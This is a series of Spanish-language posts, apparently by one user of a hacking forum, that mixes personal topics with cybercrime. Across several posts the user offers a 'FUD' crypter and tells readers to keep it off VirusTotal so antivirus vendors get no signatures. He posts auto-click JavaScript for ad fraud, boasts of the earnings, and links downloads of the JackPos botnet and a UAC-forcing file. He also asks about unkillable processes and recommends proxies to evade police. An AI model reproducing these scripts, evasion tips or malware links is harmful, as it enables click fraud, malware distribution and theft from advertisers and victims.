Temas

Muy buenas hermanos,

Este tema lo abro por mi preocupación sobre realizar la firma que va en el carnet de Ciudadano. Aquí en México credencial para votar. Que el próximo año voy para los 18 años.
He investigado mucho acerca de realizar la firma, pero no me sale.
Intento e intento y cada firma que trato de hacer es muy diferente.

Soy un tipo muy serio en la vida real, pero también soy extrovertido cuando se trata de socializar. No se si va la psicología en las firmas. Pero mi manera de escribir es en cursiva, con algo de script (esta es la letra script).

Quisiera saber ¿cómo ustedes se las ingeniaron para realizar su firma?, ¿qué procedimientos o cómo estuvieron identificando los caracteres que conforman la firma?
A mi me encantaría realizar una buena firma pero también en cursiva.

Gracias por su tiempo .
Saludos.

[ZeroAccess clic botnet fraude tose vuelta a la vidaby Mark Stockley on January 31, 2015 | Deja un comentarioFILED UNDER: Botnet, Malware, Microsoft, Security threats, SophosLabsZeroAccess La botnet ZeroAccess infame está de vuelta en las noticias otra vez.Por segunda vez desde diciembre de 2013, cuando se hizo un escondite grave de la Unidad de Crímenes Digitales de Microsoft y sus socios en la industria y la aplicación de la ley, la red de fraude de clics muy reducido ha tosido nuevo en la vida.El otrora poderoso botnet es ahora sólo una sombra de lo que fue, sin embargo, y los esfuerzos de derribo de un poco más de un año atrás parecen haber tenido un efecto grave y de larga duración en la red y sus operadores.El número de direcciones IP que participan en la red es ahora una fracción de su pico y no parece estar creciendo.Alrededor de 50.000 ordenadores están actualmente cooptadas en la red ilegal, que lo pone en territorio jornalero sin complicaciones, botnet.Ese es un pensamiento serio.Es la historia de ZeroAccess, y su tamaño histórico, que hace que sea de interés periodístico - en circunstancias normales un fraude botnet cometer utilizando los recursos robados de decenas de miles de personas no se sostiene lo distingue de la multitud.Las botnets son grandes, colecciones para todo uso de las computadoras bajo el control de los criminales.Los equipos que componen la red de bots - desde los servidores, PCs de escritorio y en algunos casos incluso los teléfonos - son reclutados en secreto el uso de software malicioso.Una vez que son parte de una botnet computadoras puede ser tarea de una serie de actividades, más comúnmente el envío de grandes volúmenes de spam y malware .Un enfoque principal para ZeroAccess era el fraude de clics - el acto de hacer dinero ilegalmente haciendo clic en su propio PPC (pago por clic) anuncios.Al igual que cualquier tipo de publicidad, PPC es una manera para que las empresas comercializan y dirigir el tráfico.Sitios web de los anunciantes de recompensa que alojan sus anuncios con una pequeña cuota cada vez que se hace clic en un anuncio. Todos los clics no son iguales, aunque - que haga clic se supone que es un cliente potencial; una persona real, clic deliberadamente.Si usted puede conseguir las computadoras en una red de bots para hacer clic en sus propios anuncios sin renunciar a sí mismos a medida que las computadoras, o si usted puede conseguir los dueños de las computadoras para hacer clic en los anuncios, sin saberlo, usted puede ganar dinero mediante la adopción de esas recompensas de manera fraudulenta (utilizando los recursos adquiridos ilegalmente.)En su apogeo la botnet ZeroAccess había cordada en millones de víctimas y fue costando anunciantes en línea se estima que $ 2,700,000 euros al mes.También demostró ser muy resistente a los esfuerzos para desestabilizar la misma.Esa capacidad de resistencia vino, al menos en parte, del hecho de que se trata de una red P2P (Peer-to-Peer). En una red P2P cualquier computadora pueda obtener lo que necesita de cualquier otro equipo - todos son igualmente importantes e igualmente desechable.Los propietarios de ZeroAccess serían sembrar plugins de malware en la red de bots y difundirlas a todos los equipos de la red, peer-to-peer.Los esfuerzos de derribo de diciembre 2013 se centraron en los plugins en lugar de los pares - plugins individuales se basaron en los servidores que podrían ser bloqueados.]

Muy buenos compañeros del foro.

Les dejo esta noticia que acabo de ver en la red.
Me es muy interesante y les dejo para que se informen mas del tema.
Les pido a los moderadores un poco de compasión acerca de esto. (Que no me borren el tema como se me hizo anteriormente en otros temas).

ZeroAccess clic botnet fraude tose vuelta a la vida
by Mark Stockley on January 31, 2015   | Deja un comentario
FILED UNDER: Botnet, Malware, Microsoft, Security threats, SophosLabs
ZeroAccess La botnet ZeroAccess infame está de vuelta en las noticias otra vez.

Por segunda vez desde diciembre de 2013, cuando se hizo un escondite grave de la Unidad de Crímenes Digitales de Microsoft y sus socios en la industria y la aplicación de la ley, la red de fraude de clics muy reducido ha tosido nuevo en la vida.



El otrora poderoso botnet es ahora sólo una sombra de lo que fue, sin embargo, y los esfuerzos de derribo de un poco más de un año atrás parecen haber tenido un efecto grave y de larga duración en la red y sus operadores.

El número de direcciones IP que participan en la red es ahora una fracción de su pico y no parece estar creciendo.

Alrededor de 50.000 ordenadores están actualmente cooptadas en la red ilegal, que lo pone en territorio jornalero sin complicaciones, botnet.

Ese es un pensamiento serio.

Es la historia de ZeroAccess, y su tamaño histórico, que hace que sea de interés periodístico - en circunstancias normales un fraude botnet cometer utilizando los recursos robados de decenas de miles de personas no se sostiene lo distingue de la multitud.

Las botnets son grandes, colecciones para todo uso de las computadoras bajo el control de los criminales.

Los equipos que componen la red de bots - desde los servidores, PCs de escritorio y en algunos casos incluso los teléfonos - son reclutados en secreto el uso de software malicioso.

Una vez que son parte de una botnet computadoras puede ser tarea de una serie de actividades, más comúnmente el envío de grandes volúmenes de spam y malware .

Un enfoque principal para ZeroAccess era el fraude de clics - el acto de hacer dinero ilegalmente haciendo clic en su propio PPC (pago por clic) anuncios.

Al igual que cualquier tipo de publicidad, PPC es una manera para que las empresas comercializan y dirigir el tráfico.

Sitios web de los anunciantes de recompensa que alojan sus anuncios con una pequeña cuota cada vez que se hace clic en un anuncio. Todos los clics no son iguales, aunque - que haga clic se supone que es un cliente potencial; una persona real, clic deliberadamente.

Si usted puede conseguir las computadoras en una red de bots para hacer clic en sus propios anuncios sin renunciar a sí mismos a medida que las computadoras, o si usted puede conseguir los dueños de las computadoras para hacer clic en los anuncios, sin saberlo, usted puede ganar dinero mediante la adopción de esas recompensas de manera fraudulenta (utilizando los recursos adquiridos ilegalmente.)

En su apogeo la botnet ZeroAccess había cordada en millones de víctimas y fue costando anunciantes en línea se estima que $ 2,700,000 euros al mes.

También demostró ser muy resistente a los esfuerzos para desestabilizar la misma.

Esa capacidad de resistencia vino, al menos en parte, del hecho de que se trata de una red P2P (Peer-to-Peer). En una red P2P cualquier computadora pueda obtener lo que necesita de cualquier otro equipo - todos son igualmente importantes e igualmente desechable.

Los propietarios de ZeroAccess serían sembrar plugins de malware en la red de bots y difundirlas a todos los equipos de la red, peer-to-peer.

Los esfuerzos de derribo de diciembre 2013 se centraron en los plugins en lugar de los pares - plugins individuales se basaron en los servidores que podrían ser bloqueados.
...........
WolfStyle! 
LEER MAS:https://nakedsecurity.sophos.com/es/2015/01/31/zeroaccess-click-fraud-botnet-coughs-back-to-life/

Saludos.

Muy buenas hermanos,

Quiero hacer una estadística a cuenta propia para saber las diferentes circunstancias económicas que hay en tu país.

Yo empiezo.
El salario mínimo en mi país es de ($900 Pesos Mexicanos) 60 USD semanalmente.
Puerto Vallarta, Jalisco, México.

PD: Si lo puedes dejar una estimación en dolares esta mejor.
Saludos.

[Mod: Tema movido]

Muy buenas compañeros y hermanos.

Este tema va dedicado mas a los moderadores y al creador del sitio, por igual a las personas que tienen tiempo en este foro.
Y pues estoy harto de recibir mensajes de personas nuevas que me comprometa a ser parte de grupos, pasar temas ilegales y no éticos, pasar herramientas (véase el caso de programas para hackear a la gente).
No voy a decir nombres pero esta semana he recibido al rededor de 100 - 110 mensajes y me inundan la bandeja de entrada con Spam. No se si haya sido la misma persona con distintos usuarios. Pero no me importa. Pero se han pasado de listos.
Se que muchos de ustedes reciben por igual o probablemente mas, o menos.
Quiero solicitar a los moderadores que pongan la opción de bloquear al usuario que este mandando mensajes o a la primera persona que te envié estos mensajes.
Los moderadores pues no tienen que pasar por esto, fácil pueden bloquear a estos usuarios de su lista. Y ya, pero los demás no  .
Realmente me gustaría que estuvieran a favor de esto a todos aquellos usuarios que han sido hostigados por los nuevos y les importa un trozo de ver.. lo que les pueda pasar a ustedes.
No digo que el moderador no haga nada. ¡Por supuesto que lo hace!, pero en este caso se tiene que hacer una investigación y mas.

Quiero leer sus opiniones y a los que apoyen esto les pido que lo hagan.
Así que nada hermanos, voy a leer cada una de sus respuestas.
Gracias a todos y Saludos.

Mod: Tema movido

Muy buenas hermanos,

En este tema busco saber cual tipo de propagación es la mas efectiva de este año.
Algunas personas con buen conocimiento e han dicho que los mejores son los Exploits Kits, otras la propagación P2p y algunos me han dicho que son las java drivers.
Pero he sacado conclusiones.
Que el mejor método de propagación es la ignorancia sobre estos temas.

Se que es cierto.
Pero hasta cierto punto no puedo definir cual es superior a la otra.
Me gustaría que me explicaran como funcionan los exploit kits que no tengo mucha información sobre ellos.

Les agradezco mucho por leerse el tema.

Gracias y Saludos.

Muy buenas hermanos,

Tengo un problema con ZenPhoto, y no puede añadir banners, he estado buscando en foros de ZenP y nada.
Me estoy dando cuenta de que no tiene esa opción, o eso es lo que creo .
¿Alguien tiene idea de como agregar banners a ZenPhoto?

Les Agradezco por su tiempo .
Gracias y Saludos.

Muy buenas hermanos,

Vengo a preguntarles y a leer su opinión, acerca de los cortes de pelo.
¿Cual es la verdadera razón por la cual los hombres deben cortarse el pelo?, y porque cojones les permiten tener el pelo largo a las mujeres.
Una de las razones por lo que deje la escuela fue por el pelo (pero irónicamente, en la que estaba, no me decían nada del pelo, osea no había reglas sobre el pelo, pero en la Secundaria si y me puteaba mucho).
¿Porque no se puede usar una maya y listo ?, se que algunos establecimientos no lo piden, pero en la mayoría si, si no es por higiene es por personalidad y profesionalismo.
Es casi lo mismo con los tatuajes, yo no estoy en contra de ellos, pero jamas me haría uno de verdad. En mi opinión, si alguien llegara a pedirme trabajo en un establecimiento con una melena y un tatuaje o mas, le daría trabajo.

Pregunto esto, por que me lo he cortado hace unas horas y la he cagado terriblemente.
No me queda el pelo corto. Ya que en mi trabajo al que estoy solicitando entrar es un requisito tener el pelo corto. Y pues trabajo con comida.
Mi mama se ha decepcionado un poco por eso, y yo también. Pero bueno, ya crecera en unos 3-4 meses.

Muchas gracias por su tiempo hermanos. Gracias.

Saludos.

Les dejo unas imagenes:

Muy buenas hermanos,

He tenido varios problemas para ejecutar un exe desde varias extensiones, la razón es obvia, ya que al hacer eso la extensión exe se traduce a la extensión destinada.
Osea, queda inutilizable.
He visto muchos viedeos en los que explican como cambiar la extension, pero no se muestra si se corre o no .
Quisiera saber, ¿Si realmente se puede correr esta extension en cualquier otra o no?

Gracias por su tiempo,
Saludos.

Muy buenas hermanos,

Pues me ha surgido un problema con un "virus", no del todo.
La cosa va que compre un crypter. Me logueo en netseal y al abrirlo, el mouse de mi laptop no funciona, una vez que la cierro, al volverla a abrir, mi sorpresa fue que no se movia el cursor. Tengo que usar el Touchpad.
Algunas veces se me va el mouse y hasta reiniciarla, vuelve a funcionar. De igual manera con el navegador chrome. Solo con el navegador.
Y pues la he restaurado varias veces. Despues que la restauro todo normal, pero creo que es el crypter el que hace eso.
Mi pregunta es, ¿Como cojones puede hacer un crypter eso?
¿Que comando usa para bloquear el mouse?
Mi laptop es una Lenovo Flex 14-2

Les agradezco por tomarse la molestia y ya saben la frase.
Gracias y Saludos.

[Muy buenas,Quiero compartir con ustedes mi crypter FUD:Es FUD, y esta constante mente actualizado, (el stub).Ayer estaba 6/35 y ahora 1/35.]

Muy buenas,

Quiero compartir con ustedes mi crypter FUD:



Es FUD, y esta constante mente actualizado, (el stub).


Ayer estaba 6/35 y ahora 1/35.

Se pueden loggear con mi cuenta, y no lo quiero crackear porque no me ha dado tiempo, ademas que si hago eso, temo que no siga en actualización, y ademas porque el tipo que me lo vendió le costo trabajo hacerlo.
Me costo 15 USD y pues lo vale.

Quien lo pida por MP, se lo paso con todo y cuenta.
Por favor, jamas, jamas de los jamaces, analices el archivo cifrado en VirusTotal, Meta-Scan, ni otros, que no recuerdo. Porque envían firmas a los anti-virus.

Puedes analizarlo con ReFud, V2Scan. Y mas tarde les comento cuales mas xD.
Que ni se les ocurra querer cambiar la pass de mi cuenta que yo tengo todo el control.
Que lo disfruten.

Saludos.

Quiero hacer exepcion que no se lo voy a pasar a usuarios nuevos sin conocimientos ni mucho menos ética.

Muy buenas hermanos,

Pues han fraudeado a un amigo muy querido mio, y pues estoy emputadisimo por eso.
El hecho va que abrió una tienda de ropa online. Donde envía los pedidos mundial-mente a quien lo solicite desde Ucrania, al hacer las cuentas con el banco, faltaba dinero. Pero el error de el fue que enviaba el paquete antes de recibir el dinero. Los fraudulentos al llegarles el paquete de ropa, cancelaban con el banco para que les devolvieran el dinero. Fueron 22 personas en México, San Luis Potosí. No me ha dado mas informes y pues pienso analizar el asunto desde raíz y si es posible obtener las ip, para meterles un susto. Debo saber y coincidir si fueron ellos, alguien tiene que hacer el papel de policía por desfortuna, pero eso no es lo que me importa. Porque va a tener que demandar a esas personas y exibirlas. Quiero saber si ¿puedo sacar las IPs desde la pagina donde hicieron las peticiones de compra?. Le robaron mas $500 USD en productos, eso se me hace una puteria muy grande.

PD: También quiero saber, ¿Como reportarles a la compañía de servicio de internet, a la que me arrojara el análisis, el fraude que se ha cometido?, para que con una orden de la policía den la información restante y poder localizarlos exactamente. Ademas de la info de los bancos.

Gracias hermanos, y en serio espero sus respuestas.
Saludos.

Muy buenas hermanos,

En esta ocasión quiero compartirles todos los iconos del sistema para la razón que sea que la vayas a usar.

Son 324 Iconos en total, creo que me pase por 2  , pero Están completos.

Les dejo la descarga:
http://www.mediafire.com/download/cccfht7df5kpalh/Iconos+del+Sistema.rar

Si lo borran o es modificado me avisan.
Que lo aprovechen.

Saludos.

Muy buenas hermanos,

Me surgió un problema en una prueba de pentesting.
Mi pregunta va si es posible ejecutar un .exe o cualquier otro archivo como Administrador.
Por ejemplo, lo subo a un gestor de descarga desde mi laptop y lo abro en mi otra pc.

Hasta ahora no he visto nada parecido, al abrirlo no se ejecuta como admin y tengo que hacerlo manualmente.
Me gustaría que me explicara como funciona en Windows.
Tengo un crypther que un compañero me paso. Y se ejecuta con UAC, Forzandolo
aunque escoja la opcion "NO", no se puede cerrarlo.
Pero me gustaria que me explicaran como funciona.

Les agradezco por tomarse la molestia de leerme y por su tiempo.

PD: Te dejo el archivo para que entiendas de lo que hablo:
http://www.mediafire.com/download/xiay57g8xrxkk2w/Force_admin.rar
Gracias y Saludos.

Muy buenas hermanos.

Como dice le titulo, ¿hay alguna funciona para que no se pueda finalizar un proceso?
He estado invesigando pero no se si es correcto:

Código [Seleccionar] Expandir

e.CloseReason = CloseReason.TaskManagerClosing
"o agregar":

Código [Seleccionar] Expandir

e.CloseReason = CloseReason.TaskManagerClosing OrElse e.CloseReason = CloseReason.WindowsShutDown

Si alguien me explica estaría muy agradecido.
Muchas Gracias por su tiempo y Saludos.

Muy buenas hermanos,


Pido a lo moderadores que borren este tema, que además el crypter ya no sirve para nada.  


Saludos.

Muy Buenas a todos,

Hace un mes expuse el pupup automatico de click-no fraud, de Exoclick.
Aqui les dejo las ganancias que he generado durante 4 días y un intenso desgaste para acumular muchos clientes. Que solo me servirán durante unas cuantas semanas antes de que se percaten que algo anda mal.


PD: Las ganancias mostradas aquí, no son en Dolares, Esta en mi moneda nacional. En Pesos Mexicanos. $1 Dolar = 14 Pesos Mexicanos.
Son en total aproximadamente $990 USD.
Podemos sacar partido a estas oportunidades que nos ofrece Internet.

Saludos.

Muy buenas bro's,

Probablemente este tema es muy polémico y ha sido difundido, debatido, comentado y muchas cosas de problemas y dudas.
Pero mi pregunta  va, ¿que los antivirus nos protegen?, no me la respondan que es un tema inicial.
Desde hace un tiempo he dejado a un lado los antivirus, ya que no son del todo protectores de nuestra seguridad y privacidad. Dependiendo el que tengas sera el mayor protector y analista de archivos indeseables.
http://subefotos.com/ver/?ce0aca471408ba9483b995c5c4004c57o.png

En este caso solo tube que usar un crypther, sin volverlo a cifrar con otro, para hacerlo indetectable completamente.

Pero ahora, pues se que son de utilidad para quitar archivos basura "malwares indeseados o virus que molestan". O siplemente para dar una sencilla advertencia de peligro.
Viendo el comportamiento de la botnet Atrax. Me doy cuenta que el Tor no es tan importante como la difunidicion de su codigo en especial. Es decir, que no es lo mismo que una botnet vieja.
De alli viene el peligro que muchos temen.
¿Entonces. Los crypthers jamas van a desaparecer?

Asi que nada, los crypthers son un peligro, ya que rondan en internet sin saber que uso se les dara. Es decir he probado armar una botnet con 1 solo infectoado y hasta ahora me sorprende la cifra. Es decir suficiente para tumbar una web comun.
No me gusta como va esto. Sigue en aumento.

Gracias a todos por su tiempo y Saludos.

Hola a todos bro's,

Mi pregunta que si ¿se puede abrir un archivo x al ejecutar windows, es decir de alguna manera que se copie en un lugar como Startupdir, appdata o luagares que inicien por defecto al iniciar windows?, porque son necesarios.
Si es así ¿cuál sería la manera?
Que estoy tratando de ejecutar algunos portables. Un ejemplo un libro pdf, o un exe de imagenes incluidas.

Les agradecería si me respondieran y más por su tiempo.
Gracias y Saludos.

Muy Buenas bro's,

Pues, no me han baneado la cuenta, pero si la ip. ¿Me pueden dar la razón del baneo de la ip?, ¿o la web sufrió un ataque?

Esa es me pregunta , que la unica manera de entrar es por un proxy.

Les agradezco por su tiempo.
Gracias y Saludos.

[Mod: No hacer doble post.]

Muy Buenas bros,

Respecto a los popup mencionados en el ultimo tema que hice, quiero dar un ejemplo muy productivo, acerca de un popup no emerguente, pero sin duda que casi consigo.
Este banner solo es un ejemplo sencillo y no es el real

Código (html4strict) [Seleccionar] Expandir


<html>
<head>
<script>
window.onload = function(){
 document.getElementById("autoid").click();
}
</script>
</head>
<body>
<a href="http://www.exoclick.com/?login=owleyes" id="autoid"><img src="http://www.exoclick.com/banners/120x150.gif" border="0" id="autoid"></a>
</body>
</html>

Y bueno, hasta ahora con el banner convertido en popup, no he conseguido abrirlo en si, solo falta un detalle para conseguirlo, y es el autoid

Código (javascript) [Seleccionar] Expandir



<html lang="es">
<head>
<script type="text/javascript" src="https://ads.exoclick.com/ads.js"></script>
<script>
function simulateClick(x, y) {
var clickEvent = document.createEvent('MouseEvents');
clickEvent.initMouseEvent('click', true, true, window, 0, 0, 0, x, y, false, false, false, false, 0, null);
document.elementFromPoint(x, y).dispatchEvent(clickEvent);
}
</script>

</head>

<html>
<head>
<script>
window.onload = function(){
 document.getElementById("autoid").click();
}
</script>
</head>

<body>

<div>
<a href="http://main.exoclick.com/img-click.php?idzone=1391156" target="_blank"><img src="https://syndication.exoclick.com/ads-iframe-display.php?idzone=1391156&output=img&type=728x90" width="728" height="90"></a>
</div>
<script>simulateClick(150, 80); </script>


</body>


Y pues no hará falta :

Código (javascript) [Seleccionar] Expandir



<html lang="es">
<head>
<script type="text/javascript" src="https://ads.exoclick.com/ads.js"></script>
<script>
function simulateClick(x, y) {
var clickEvent = document.createEvent('MouseEvents');
clickEvent.initMouseEvent('click', true, true, window, 0, 0, 0, x, y, false, false, false, false, 0, null);
document.elementFromPoint(x, y).dispatchEvent(clickEvent);
}
</script>

</head>


Si consigo el autoid.
Pero lo he puesto, dado el caso que me falla al abrirlo.
Alguien tiene una manera de colocarlo y me lo abra?

Les agradezco por su tiempo.
Gracias y Saludos.



Bueno, pues no espero que me hagan el trabajo por mi, tampoco quiero ser enfadoso, como o como se diga en su país sobre, estar pidiendolo constantemente una cosa.

Pero les dejo un avance sobre el popup que si se abre

Código (html4strict) [Seleccionar] Expandir

<html lang="es">


<html>
<head>
<script>
window.onload = function(){
 document.getElementById("autoid").click();
}
</script>
</head>

<body>

<div>
<a href="http://main.exoclick.com/img-click.php?idzone=1391156" id="autoid"> <(img src="https://syndication.exoclick.com/ads-iframe-display.php?idzone=1391156&output=img&type=728x90" width="728" height="90") id="autoid"</a>
</div>
<script>simulateClick(150, 80); </script>


</body>
</html>



Se los dejo para aquellos que quieran saber sobre esto, no hay necesidad de seguir el mouse como un scroll, o un script tan complicado, como los que encontre, que no me funcionaron.
Este es sencillo pero eficaz. A veces lo mas sencillo es lo mas efectivo.
Si alguien quiere hacerle una modificación, o agregarle algo para que sea mejor. Puede hacerlo.

PD: Respecto al scrit de autoclick, si no se abre en su escritorio, es que no fue diseñado para abrirse sin una web. Deben colocar su banner o este, en su web, modificando los caracteres mencionados anteriormente. Ya sea en una web o blog, deben colocarlo desde Witget/HTML, y verán que serán direccionados. No quiero hacer SPAM o redirigirlos a otro sitio, pero les dejo el ejemplo original.
El banner está a la derecha, arriba de la pagina.
clubpowerstyle.blogspot.mx

Saludos.

Mod: No hacer doble post.

Se me paso

Hola a todos bros,

Como dije arriba, ¿se se puede impedir que un popup sea bloqueado?, sin duda es algo que en un foro vi explicarón el motivo por lo que no se puede impedir con nuevos script de Jquerry, pero no dejaron el código y además no se nada de Jquerry, pro si, algo de javascript. Por lo que estoy interesado en aprender Jquerry. Pero, no quiero el codigo en concreto, mas bien me interesa saber si se puede abrir un popup sin el bloqueo emergente.

Si alguien me dice si o no, expliquenme porqué xD, les agradezco por su tiempo.
Gracias y Saludos.

Muy buenas,

Quisiera saber si las peticiones javascript se ejecutan antes de que cargue la pagina, me he leído información de que inclusive la petición se ejecuta antes! de cargar completamente la pagina, es decir que ni siquiera tendría que esperar a que abra la pagina o ni de plano abrirla y se cuenta como post!!!!!

¿Eso es cierto o falso?

Gracias y Saludos.

Muy Buenas hermanos,

Sé que no es muy usual que pregunten por aquí sobre categorías de juegos, ni mucho menos que pidan juegos sobre sus descargas masivas. Pregunto aquí pues no me quedó más opción en un foro donde les gustan mucho las computadoras.
Pero me gustaría saber qué juegos son los más descargados de xbox live para xbox o pc, que están a la espera y aún no han salido. O que tienen mucha demanda.
Me gustaría que me en listen algunos nombres si lo saben.
Y por supuesto les agradezco por su tiempo. Gracias y Saludos.

Hola a todos bro's,

Últimamente me la he pensado mejor en cuanto a diferencias entre javascript y JQuery, con javascript me la he llevado muy bien, y con JQuery, no tengo nada de experiencia, y sin duda me di cuenta que JQuery es una buena opción encuanto a ocultar enlaces, es decir a que si quieren descargar algo den clic en un enlace o banner y despues muestre la descarga.
Ejemplo:
<!-- HTML -->
<p>Pregunta... (<a href="#" id="Click en banner para descargar-ej1">Click al banner</a>)

<div id="www.descarga aqui.com" style="display:none">descarga </div>

Entonces no sabre como hacer algo como eso, pero con algo de investigación se logra.
Mi pregunta va, cuál me convendría entre esos dos para hacer lo que acabo de explicar?
Y si con un simple javascript puede leer peticiones http de get o post, de cualquier lado?
Gracias y Saludos.

Hola a todos,
Chicos, en éste post vengo con intenciones de saber si conocen botnets HTTP, ya que por ello he probado de todas pero ninguna me complace.
Sin lugar a dudas no vengo para sacarles info y ser un diablillo despues de ésto, si han mrado mis otros post, he conseguido las botnet mas ostias, que van desde Atrax hasta JackPos, Inclusive he tratado de conseguir a Barracuda, pero no me gusta como se ve, es decir necesita IonCbe y es una dependencia muy grande.
Me he adentrado en saber como funcionan las botnet HTTP por sus peticiones get y post, no voy a usarlas para mal si no para ver sus códigos y sus infecciones con su panel+builder.
Por el momento la que me ha complacido sin mucho problema es Athena HTTP, pero tiene algunos fallos muy importantes, así que me la he pensado si con un rat, pero prefiero saber de algunas personas que sepan mucho mas de este tema que yo cuales son efectivas (botnets HTTP, no de DDOS, que solo sobrecargan la web y eso ya me lo sé).

Les agradezco mucho por leer mi post y Saludos.

Hola a todos,

Lo siento creo que no puedo dejarselos por mucho tiempo. Es una bot muy peligrosa y muy buscada.
Saludos.

Hola a todos,
Este post surgió gracias a usa situación que sin duda algua me sucedió. El foro, solo banea direcciones ip, pero no con certeza y desde luego en caso de involucrar a la policía tendrán que dar tu ip bajo una orden. Claro que no podrás usar tu misma cuenta por el bloqueo temporal o de plano permanente, dependiendo la infracción.
Solo basta tener un proxy online para darle sentido a la evasión de rastros.
Y eso no solo funciona aquí funciona en todo internet indexable. Por otros motivos se puede usar para tus lucros economicos, pero no voy a decir para qué puedes usarlos.
Tengan en cuenta que esto es para abrir los ojos de la facilidad de cometer delitos y mantenerte sin un solo pelo dañado. O eso es lo que creo dependiendo el delito que hagas, entre mas grande sea mayor será tu búsqueda.
Saludos.

[El builder que tienen no es el Builder que hace el exe infectable.]

Hola a todos,
Sin más espera les dejo la botnet JackPos.
Ojo no tiene el Builder, así que no podrán tener bots clientes o zombies. Les he traido esta botnet para que se estudien el codigo madre o el source.
El builder que tienen no es el Builder que hace el exe infectable.

Les dejo el link: http://www.mediafire.com/download/zy9c55b5v5ccva4/JackPos.rar

Saludos.

[¿puedo dejar un link con un blog donde puedan visitar estas bots?]

Hola a todos,

De nuevo por aqui preguntandoles a los moderadores si puedo mostrar algunas botnets, que son de pago, pero sin envargo de alguna manera las he conseguido.
Botnets, como dicen aqui "ostias". Que van desde Atraxs hasta JackPos Malware, y de alli estan las menos poderosas.

Mi regunta va que si ¿puedo dejar un link con un blog donde puedan visitar estas bots?, ojo lo hago para que puedan entender el source de cada una de ellas y las usen solo para pruebas de pentesting.

Gracias.
Saludos.

[¿se puede crear un script para desviar el ddos con un javascript hacia un punto de la misma web?]

Hola a todos,

Desde luego mi pregunta surgio cuando estaba con algunas teorias de crear un script de mitigar un ataque, que sin envargo no se como se utiliza, y quiero saber si ¿se puede crear un script para desviar el ddos con un javascript hacia un punto de la misma web? o ¿redireccionarla a otro lugar, como una web desalojada o en blanco?

Gracias,
Saludos.

[Antes que nada, antes de que esribas y antes de que eches tierra a este post, las botnets no son ilegales, toma en cuenta que tienes un untencillo, lo vas a usar para lastimar?, Y con que argumento valido y logico, te basas si crees que son ilegales?,]

Muy buenas a todos,

Hace un par de semanas me encontre con un archivo de botnet (zeus), me lo monte localmente, y no lo considero malo, ni tampoco lo he venido a criticar, pero se me hace bastante ovio.

Me encontrado con varios canales en Youtube con botnets de TDL. Para ello, no me he metido a investigar ni experimentar en botnets con onion en la deep, para ello, no se si sea directamente indexeable en la red "indexeable" , en si, si alguno tiene una experiencia con esto me gustaria saber si han conseguido una buena botnet ya sea P2p o TDL.

Antes que nada, antes de que esribas y antes de que eches tierra a este post, las botnets no son ilegales, toma en cuenta que tienes un untencillo, lo vas a usar para lastimar?, Y con que argumento valido y logico, te basas si crees que son ilegales?,


Asi que nada amigos, les pido que me echen una mano con esto, no digo que me den el link de descarga, pero si se pudiera mejor no xD  , nee es broma.
Gracias y Saludos.

Hola chicos

Un buen tiempo que no preguntaba algo por aquí desde mis depresiones xD.
En fin, estuve auditando la seguridad remota y la de Mail, y se me ocurrió, ¿Como le hacen los spammers para enviar los correo basura?, les conste desde antes, no voy a hacer esto si creen que eso haría y tampoco quiero enfadosos pretensiosos; se que funciona con una botnet, pero como le hacen para comandar esos Correos desde el panel de adm?
Leí un poco sobre ellos y vi un articulo que pueden enviar un millon de Correos basura en 25 segundos con 20mil zombies, ósea que cada uno serian 400 Correos, eso es lo que no me explico que estén conectados con hotmail.

PD: No quiero que me digan el proceso, sino una explicación breve de su ingeniería.

Un Cordial Saludo

Hola chicos

Llevo un buen rato que no entro por aqui. En fin, me he buscado en google servidores gratuitos en los que no me quiten el dominio ni me limiten hasta el cuello. Pero hasta ahora ninguno me convence por multiples razones desconcertantes.
Las caracteristicas que busco son estas:

•Que tenga por lo menos 500 mb de espacio.
•Que pueda tener dominio .com, .net, .tv o que no sea .com.br xD
•Que soporte almenos 100,000 visitas.
•Que soporte php

Chicos, si alguno tiene experiencia en webs, les agradeceria que me informaran del asunto.

Gracias y Un Cordial Saludo

Hola a todos,

Como siempre, mis intereses no son de ofender a nadie o hacer cosas que salgan de la ética y afecten a otras personas, pero en éste caso vengo a preguntar sobre publicidad de chicas (satisfacción). No es morbosidad o sadismo, nada en particular.

Tengo una página web tiene pocas visitas, pero en cuanto la afile a la web de la Universidad donde trabajo las visitas aumentarán.
Le pregunte a el encargado de la Administración en línea que si podía hacer ésto solo por unas 3 semanas para ganar algo de dinero porque estoy corto de dinero en éstos días. Me dijo que si, si no había ningún problema.

¿Saben qué tipo de publicidad paga por muy bien por visita que sea así como PlayBoy o similares?
Repito, no es por promover la satisfacción privada de la gente, si no porque quiero generar ganancias, aprovechando que tengo lista mi web.

PD: Por ejemplo un tipo de publicidad como ésta también me serviría: http://web.archive.org/web/20110628135359/http://foro.elhacker.net/viewthread.php?tid=225, es de Chispain.com

Un Cordial Saludo  

Hola a todos  

Mas que nada, quiero anunciar que hago éste tema por motivos personales que me entristecen y me desespera, porque no tengo a quién más contarselo, mas que esperar respuesta de ustedes.

Éste Lunes, acabo de entrar a la escuela, 3er semestre de Preparatoria.
Por lo que odio la vida de un sedentario. Éstas vacaciones me adapté mucho al ejercicio y me encantó tanto que me olvidé de muchos problemas de otras materias, que ni al caso, no entiendo porqué las ponen.

Prefiero pasar 4-5 horas haciendo ejercico, trabajando en mis proyectos, sin tener que escribir basura de mierd.a en mi libretas y gastar hojas, teniendo que aguantar a los imbeciles que me hacen mala cara, y lo peor de todo, no se les puede decir nada por evitarme una pelea cuerpo a cuerpo.
Observo a los chicos y solo veo una generación de mediocres, se adaptan al celular como si tuberan enlace simbiótico de vida. No pueden vivir sin él.
Y para mi eso es una desesperación, porque quiero motivación, competencia. Pero nada de eso. Prefiero estar solo y ser autodidacta por mis porpios medios sin estar sentado, quizá conviviendo con una persona madura.

Porque aunque no lo crean en el aspecto laboral y financiero, y en muchos propósitos, soy muy maduro. Porque hay una meta de proposición.
Eso es lo que me motiva a seguir por mi propia cuenta y ayudar a quienes estén interesados de verdad con problemas similares a los mios.

El problema mio es que no tengo ganas de ir a la escuela por esos motivos  

Y me siento mal, porque también algunos maestros de allí (solo en la prepa y Cq, no en la Universidad) se pasan de la raya, como los escolantes.

Estoy viendo en éste momento videos de motivación fiteness, académicos y de más.

No tengo yaa tanta hambre como en las vacaciones, que terminaba todo el ejercicio y a comer womi  , no he hecho hoy por hacer trabajos que me retrasan, aunque de verdad preferiría el sistema de Holanda , pero lastima, así se aseguraría la máxima retención.

Me encantaría que me dieran un consejo de valor que ustedes se lo tomen como si estubiesen en mi situación o pasaron por algo similar a ésto.
Muchas gracias usuarios del foro.

Un Cordial Saludo  

Hola a todos  

